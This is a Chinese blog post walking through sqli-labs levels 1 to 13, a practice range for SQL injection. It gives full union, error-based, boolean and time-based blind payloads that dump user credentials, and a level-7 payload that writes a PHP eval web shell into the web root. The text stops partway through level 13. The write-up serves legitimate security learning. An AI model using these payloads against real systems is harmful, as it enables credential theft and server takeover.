

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="sqli_labs，一个印度老哥搭建的sql注入靶场，十分方便学习SQL注入，我将在本文记录我的闯关历程。">
  <meta name="author" content="Eggs">
  <meta name="keywords" content="Blog">
  
  <title>sql_ilabs闯关历程第一页（1~20） - 蛋窝窝</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/atelier-sulphurpool-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/diy/diy.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"2693993651.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"§ "},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>蛋窝窝 •ᴗ•Hi~</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/sql_injection0.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sql_ilabs闯关历程第一页（1~20）">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      Eggs
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-05-19 22:00" pubdate>
        2021年5月19日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.6k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      56
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sql_ilabs闯关历程第一页（1~20）</h1>
            
            <div class="markdown-body">
              <p>sqli_labs，一个印度老哥搭建的sql注入靶场，十分方便学习SQL注入，我将在本文记录我的闯关历程。</p>
<span id="more"></span>

<p>由于确实没啥基础，做这个题还是靠网上教程，争取总结到位，有自己的思考。靶场搭建过程略去。</p>
<hr>
<h3 id="sql注入常规流程"><a href="#sql注入常规流程" class="headerlink" title="sql注入常规流程"></a>sql注入常规流程</h3><p><em>先附上我在b站看到的一位up主总结的sql注入大体流程</em></p>
<ul>
<li><p>判断是否有注入</p>
<ul>
<li>可控参数的改变是否能够影响页面显示结果</li>
<li>输入的sql语句是否能报错——通过数据库的报错，能看到数据库的一些语句痕迹</li>
<li>输入的sql语句能否不报错——判断我们的语句是否能成功闭合</li>
</ul>
</li>
<li><p>判断是什么类型的注入</p>
</li>
<li><p><strong>语句是否能够被恶意修改</strong></p>
</li>
<li><p><strong>是否能够成功执行</strong></p>
</li>
<li><p>获取我们想要的数据</p>
<hr>
<p>在渗透测试中，information_schema库中有三个表对我们很重要。注意：<strong>mysql5.0以上才会有information_schema这个库</strong></p>
</li>
<li><p><strong>schemata</strong> 表 中 <strong>schema_name</strong> 字段存储数据库中<strong>所有的库名</strong></p>
</li>
</ul>
<ul>
<li><strong>tables</strong> 表 中<strong>table_schema</strong> 字段存储<strong>库名</strong> ，<strong>table_name</strong> 字段存储<strong>表名</strong></li>
</ul>
<p>    * <strong>columns</strong> 表 中 <strong>table_schema</strong> 字段存储<strong>库名</strong> ，<strong>table_name</strong> 字段存储<strong>表名</strong> ，<strong>column_name</strong> 字段存储<strong>字段名</strong></p>
<h2 id="通关历程"><a href="#通关历程" class="headerlink" title="通关历程"></a>通关历程</h2><h3 id="1-4"><a href="#1-4" class="headerlink" title="1~4"></a>1~4</h3><p> 完成最简单的sql注入。</p>
<ul>
<li><p>输入单双引号，观察报错信息，构造命令，配合<code>%23</code>或<code>--+</code>使语句闭合</p>
<p>（末尾的%23是#的url编码，#用来注释sql后面的语句使payload闭合。因为如果直接在url中输入#的话，浏览器只会把#号当作位置符号，不会上传到服务器，且服务端会自动对经过url编码后的数据解码）</p>
</li>
<li><p>使用 order by 语句判断字段数，接着union select 1,2,…观察能显示的数据</p>
</li>
<li><p>构造语句查询数据库的信息,以查询列password和username为例</p>
<figure class="highlight oxygene"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs oxygene">... <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span>  <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(schema_name) <span class="hljs-keyword">from</span> information_schema.schemata %<span class="hljs-number">23</span><br><br><span class="hljs-comment">//查询所有的数据库名,查到有“security”</span><br></code></pre></div></td></tr></table></figure>



<figure class="highlight pgsql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs pgsql"><span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(<span class="hljs-built_in">table_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;security&#x27;</span> %<span class="hljs-number">23</span><br><br>//查询名为“<span class="hljs-keyword">security</span>”的数据库下所有的表名，查到有“users”<br></code></pre></div></td></tr></table></figure>



<figure class="highlight oxygene"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs oxygene">... <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span>  <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(column_name) <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">where</span> table_name=<span class="hljs-string">&#x27;users&#x27;</span> %<span class="hljs-number">23</span><br><br><span class="hljs-comment">//查询名为“users”的表下所有的字段名</span><br><span class="hljs-comment">//若不同库下有同名表下同名字段，则查询时where语句后加上 and table_schema=“security”</span><br></code></pre></div></td></tr></table></figure>



<figure class="highlight n1ql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs n1ql">... union <span class="hljs-keyword">select</span>  <span class="hljs-number">1</span>,<span class="hljs-number">2</span>, group_concat(concat_ws(<span class="hljs-string">&#x27;~&#x27;</span>,<span class="hljs-keyword">password</span>,username)) <span class="hljs-keyword">from</span> security.users %<span class="hljs-number">23</span><br><br>//查询数据库security中uers表的列<span class="hljs-keyword">password</span>和username的所有字段并用‘~’隔开<br></code></pre></div></td></tr></table></figure></li>
</ul>
<hr>
<h3 id="5-6"><a href="#5-6" class="headerlink" title="5~6"></a>5~6</h3><p> 输入的正常查询语句不再显示有用的信息，但报错语句仍有提示。此时根据题目类型“double injection”采用双查询注入的方法</p>
<blockquote>
<p><em>若SQL语句正确，则页面正常返回，但返回的页面中不包含任何有用的信息，而当SQL语句错误时，页面会显示SQL错误信息。在这种情况下，Double Injection是十分有用的。</em><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210529133753.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210529133753.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p> <em>———查询有关double injection的详细信息请点击这里<a target="_blank" rel="noopener" href="https://blog.werner.wiki/principle-of-double-injection-in-mysql/">Mysql中Double Injection原理浅析</a></em></p>
</blockquote>
<p>第一步完全一致，第二步不再用<code>select 1,2...</code>来观察回显，最多可用<code>order by</code>得到<code>union select</code> 的字段数。第三步中语句<code>union select...</code>后面拼接<code>concat((select...)</code>语句，两个select组成双查询。</p>
<ul>
<li><p>输入单双引号，观察报错信息，构造命令使语句闭合</p>
</li>
<li><p>使用 order by 语句判断字段数</p>
</li>
<li><p>构造语句查询数据库的信息<strong>（注意：group_concat函数在这里失效了，故没使用）</strong></p>
<figure class="highlight n1ql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs n1ql">...union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-built_in">count</span>(*),concat((<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>()),<span class="hljs-built_in">floor</span>(rand(<span class="hljs-number">14</span>)*<span class="hljs-number">2</span>))<span class="hljs-keyword">as</span> a <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a %<span class="hljs-number">23</span><br><br>//查询当前数据库,得知当前数据库为‘security’，如要查别的数据库就<span class="hljs-keyword">select</span> schema_name <span class="hljs-keyword">from</span> information_schema.schemata <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span><br></code></pre></div></td></tr></table></figure>

<figure class="highlight n1ql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs n1ql">...union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-built_in">count</span>(*),concat((<span class="hljs-keyword">select</span> table_name <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;security&#x27;</span> <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-built_in">floor</span>(rand(<span class="hljs-number">14</span>)*<span class="hljs-number">2</span>))<span class="hljs-keyword">as</span> a <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a %<span class="hljs-number">23</span><br>//<span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span> --&gt;limt <span class="hljs-number">1</span>,<span class="hljs-number">1</span> ...慢慢增加<span class="hljs-number">1</span>，直到<span class="hljs-keyword">limit</span> <span class="hljs-number">2</span>,<span class="hljs-number">1</span>查到我们需要的表名，如“users”<br></code></pre></div></td></tr></table></figure>

<figure class="highlight n1ql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs n1ql">...union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-built_in">count</span>(*),concat((<span class="hljs-keyword">select</span> column_name <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">where</span> table_name=<span class="hljs-string">&#x27;users&#x27;</span> <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-built_in">floor</span>(rand(<span class="hljs-number">14</span>)*<span class="hljs-number">2</span>))<span class="hljs-keyword">as</span> a <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a %<span class="hljs-number">23</span><br>//同样<span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span> --&gt;limt <span class="hljs-number">1</span>,<span class="hljs-number">1</span> ...慢慢增加<span class="hljs-number">1</span>知道查到列名username和<span class="hljs-keyword">password</span><br></code></pre></div></td></tr></table></figure>

<figure class="highlight n1ql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs n1ql">...union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-built_in">count</span>(*),concat((<span class="hljs-keyword">select</span> concat_ws(<span class="hljs-string">&#x27;~&#x27;</span>,username,<span class="hljs-keyword">password</span>)<span class="hljs-keyword">from</span> security.users <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-built_in">floor</span>(rand(<span class="hljs-number">14</span>)*<span class="hljs-number">2</span>))a <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a %<span class="hljs-number">23</span><br>//查询security.users下第一行的username和<span class="hljs-keyword">password</span>并用“~”隔开<br></code></pre></div></td></tr></table></figure></li>
</ul>
<hr>
<h3 id="7"><a href="#7" class="headerlink" title="7"></a>7</h3><p> 这里使mysql语句闭合的方式为<code>?id=1&#39;))...%23</code>比之前略微复杂,而且还没有具体的语法报错内容，只能多次尝试（这也太不友好了…<a target="_blank" rel="noopener" href="https://blog.csdn.net/gou1791241251/article/details/111568910">点击查看这位老哥构造闭合语句的过程</a>）。同样页面不再显示有用的内容，只能看出语句是否正确，同5~6情况相似，最多可用<code>order by</code>得到<code>union select</code> 的字段数。但这关双注入的方式失效了，根据提示采用上传文件的方式。</p>
<p><strong>ps：途中我遇到了怎么也上传不了文件的情况， <a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1671259">这里</a>解释了原因，即需要先修改配置，赋予权限</strong>。可以看出这个漏洞的实现有较严格的条件限制。</p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210618162821.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210618162821.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<figure class="highlight awk"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs awk">...union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span> into outfile<span class="hljs-string">&quot;C://hello.txt&quot;</span><br><span class="hljs-regexp">//</span>注意路径用“<span class="hljs-regexp">//</span>”,该语句执行结果如下，新生成了一个写有内容的hello文件。<br></code></pre></div></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210606235322.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210606235322.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>将<code>hello.txt</code>改成一句话木马的php文件,因为这里的服务器是用PHP study搭建的，所以需要把该文件上传至<code>PHPTutorial\WWW</code>目录下（不同版本的phpstudy路径可能不同，而至于实际渗透环境中，这个目录就需要靠方法找了，这里提供一个<a target="_blank" rel="noopener" href="https://blog.csdn.net/YQavenger/article/details/108967912">别人的方法-来自csdn</a>），再使用菜刀或蚁剑链接就可以了。</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php">...?id=-<span class="hljs-number">1</span><span class="hljs-string">&#x27;))union select &quot;hello world!&quot;,&#x27;</span><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;a&quot;</span>]);<span class="hljs-meta">?&gt;</span><span class="hljs-string">&#x27;,&quot;hacked!&quot; into outfile &quot;E:\\PHPTutorial\\WWW\\a.php&quot; %23</span><br><span class="hljs-string">//select 的值会写进文件中，若想写入字符串字符串需要用单引号或双引号闭合</span><br></code></pre></div></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210618230901.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210618230901.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210618231315.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210618231315.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>因为是直接上传了木马，连接成功的话就能直接控制服务器了。</p>
<hr>
<h3 id="8-10"><a href="#8-10" class="headerlink" title="8~10"></a>8~10</h3><p> 这里开始接触盲注，（盲注：后台使用了一些方法屏蔽了报错信息，此时无法通过报错信息进行注入的判断）同时这也是最常见的sql注入。</p>
<p>盲注又大概分为布尔型和时间型，其中第8关是布尔型，9、10关是时间型。</p>
<p><strong>另外因为盲注会比较繁琐，所以有必要学会使用，编写脚本。</strong></p>
<p>接下来我会从手注并配合python脚本的方式来完成。</p>
<p>第8关：</p>
<ul>
<li><p>输入单双引号，观察显示信息，构造命令使语句闭合</p>
</li>
<li><p>使用 order by 语句判断字段数（能行但没用）</p>
<p>因为显示的信息只有两种情况，语句正确时显示一句话”You are in…“,语句错误时没有显示。我们就只能利用这个信息，靠猜的方式去完成注入。这就是使用基于bool类型的注入。</p>
<p>就像这样：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs pgsql">输入<span class="hljs-number">1</span><span class="hljs-string">&#x27; and length(database()) = 5 --+，无显示 (显示异常)</span><br><span class="hljs-string">输入1&#x27;</span> <span class="hljs-keyword">and</span> length(<span class="hljs-keyword">database</span>()) = <span class="hljs-number">6</span> <span class="hljs-comment">--+，显示“you are in...”（显示正常）</span><br>输入<span class="hljs-number">1</span><span class="hljs-string">&#x27; and length(database()) = 7 --+，显示异常</span><br><span class="hljs-string">输入1&#x27;</span> <span class="hljs-keyword">and</span> length(<span class="hljs-keyword">database</span>()) = <span class="hljs-number">8</span> <span class="hljs-comment">--+，显示正常</span><br>//说明数据库名长度为<span class="hljs-number">8</span>个字符。<br></code></pre></div></td></tr></table></figure>

<p>即像这种一步步爆破的方式。这还只是得到了一个模糊的信息，注入的工作还远远没完成。所以学会利用工具是很有必要的。</p>
<figure class="highlight cos"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs cos">输入<span class="hljs-number">1</span>&#x27; and <span class="hljs-keyword">ascii</span>(substr(database(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>))&gt;<span class="hljs-number">97</span> %<span class="hljs-number">23</span>，显示存在，说明数据库名的第一个字符的<span class="hljs-keyword">ascii</span>值大于<span class="hljs-number">97</span>（小写字母a的<span class="hljs-keyword">ascii</span>值）；<br>输入<span class="hljs-number">1</span>&#x27; and <span class="hljs-keyword">ascii</span>(substr(database(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>))&lt;<span class="hljs-number">122</span> %<span class="hljs-number">23</span>，显示存在，说明数据库名的第一个字符的<span class="hljs-keyword">ascii</span>值小于<span class="hljs-number">122</span>（小写字母z的<span class="hljs-keyword">ascii</span>值）；<br>输入<span class="hljs-number">1</span>&#x27; and <span class="hljs-keyword">ascii</span>(substr(database(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>))&lt;<span class="hljs-number">109</span> %<span class="hljs-number">23</span>，显示不存在，说明数据库名的第一个字符的<span class="hljs-keyword">ascii</span>值大于<span class="hljs-number">109</span>（小写字母m的<span class="hljs-keyword">ascii</span>值）；<br>输入<span class="hljs-number">1</span>&#x27; and <span class="hljs-keyword">ascii</span>(substr(database(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>))&lt;<span class="hljs-number">115</span> %<span class="hljs-number">23</span>，显示不存在，说明数据库名的第一个字符的<span class="hljs-keyword">ascii</span>值不小于<span class="hljs-number">115</span>（小写字母<span class="hljs-keyword">s</span>的<span class="hljs-keyword">ascii</span>值）；<br>输入<span class="hljs-number">1</span>&#x27; and <span class="hljs-keyword">ascii</span>(substr(database(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>))&gt;<span class="hljs-number">115</span> %<span class="hljs-number">23</span>，显示不存在，说明数据库名的第一个字符的<span class="hljs-keyword">ascii</span>值不大于<span class="hljs-number">115</span>（小写字母<span class="hljs-keyword">s</span>的<span class="hljs-keyword">ascii</span>值）；<br><br><span class="hljs-comment">//substr(xxx,y,z)，指的是从xxx中第y个字符开始取出z个字符。</span><br><span class="hljs-comment">//所以数据库名的第一个字符的ascii值为115，即小写字母s。</span><br><span class="hljs-comment">//其它位依次操作，得到结果security</span><br></code></pre></div></td></tr></table></figure>

<p>下面是关于用脚本解决的部分。</p>
<p>关于脚本的编写请见我这一篇文章，传送门：<a target="_blank" rel="noopener" href="https://eggswoo.com/2021/06/16/py-script-sql-injection/">用python编写一个sql注入脚本 - 蛋窝窝 (eggswoo.com)</a></p>
<p>这个脚本比较low，但具备了完成该任务的基本功能，要完成其他注入则需要升级。</p>
<p>payload:查找security.users中的password</p>
<p>对应运行结果</p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210620213416.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210620213416.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>9、10关：</p>
<p> 因为无论传什么参数结果界面都完全不变，视觉上没有任何信息。所以采用基于时间的盲注方法。</p>
</li>
</ul>
<p> 判断语句是否闭合就需要用到sleep函数</p>
<figure class="highlight perl"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs perl">输入...id=<span class="hljs-number">1</span><span class="hljs-string">&quot; and sleep(5) %23//页面很快有反应，sleep函数没能生效，证明语句闭合失败输入...id=1&#x27; and sleep(5) %23//等待5秒后页面刷新，证明语句闭合成功 </span><br></code></pre></div></td></tr></table></figure>

<p>开始构造payload</p>
<figure class="highlight ada"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs ada">.../?id=<span class="hljs-number">1</span><span class="hljs-symbol">&#x27;and</span> <span class="hljs-keyword">if</span>(database()=<span class="hljs-symbol">&#x27;security</span>&#x27;,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">0</span>)<span class="hljs-comment">--+</span><br>//同样页面延迟了<span class="hljs-number">5</span>秒刷新，证明当前数据库名为security<br></code></pre></div></td></tr></table></figure>



<p>最后贴上用脚本的截图</p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210620224800.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210620224800.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<hr>
<h3 id="11-12"><a href="#11-12" class="headerlink" title="11~12"></a>11~12</h3><p> 从这里开始由get类型的注入转变为post类型的注入。之前都是可以直接在浏览器地址栏进行的get类型的注入，而通常post传送的数据不能在url上看到，只能通过抓包工具(burpsuite)或者浏览器插件（hackbar）进行查看。无论我们在他给出的登录框怎么输入，上面的url地址栏都不会产生变化。</p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/0[%7DF[P%7BHGS9$L%60ZUP9G8S8B.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/0%5B%7DF%5BP%7BHGS9$L%60ZUP9G8S8B.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>而我们在输入框中输入的数据即为post上传的数据。</p>
<p>当我在username栏末尾输入‘时报错。从这个报错语句中即可以看出这里的sql语句是以单引号闭合的。</p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210712214452.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210712214452.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>这里的username和password都是注入点，任选一个都可以使用语句注入。</p>
<ul>
<li>输入单双引号，观察报错信息，构造命令使语句闭合</li>
<li>使用 order by 语句判断字段数</li>
<li>构造语句查询数据库的信息</li>
</ul>
<p>所有步骤和1~4关的都一样，只是注入方式由get变为post,我们输入的工具语句也由在url中输入变为在表单中输入。另外注释符用#而不是%23，因为我们输入的语句不再经过浏览器url解析，可以直接上传到服务器中了。</p>
<p>12就是语句双引号加单小括号闭合，注入方法不变。</p>
<hr>
<h3 id="13-14"><a href="#13-14" class="headerlink" title="13-14"></a>13-14</h3><figure class="highlight livecodeserver"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs livecodeserver">这两关名字叫做<span class="hljs-built_in">post</span>类型的双重注入，输入的正常查询语句不再显示有用的信息，但报错语句仍有提示。通过报错信息闭合语句并查询完字段数后，根据前<span class="hljs-number">5</span>~<span class="hljs-number">6</span>关<span class="hljs-built_in">get</span>类型的双重注入经验可先按照以往<span class="hljs-built_in">get</span>类型的双重注入来尝试，果然成功了。<br></code></pre></div></td></tr></table></figure>

<p>语句：</p>
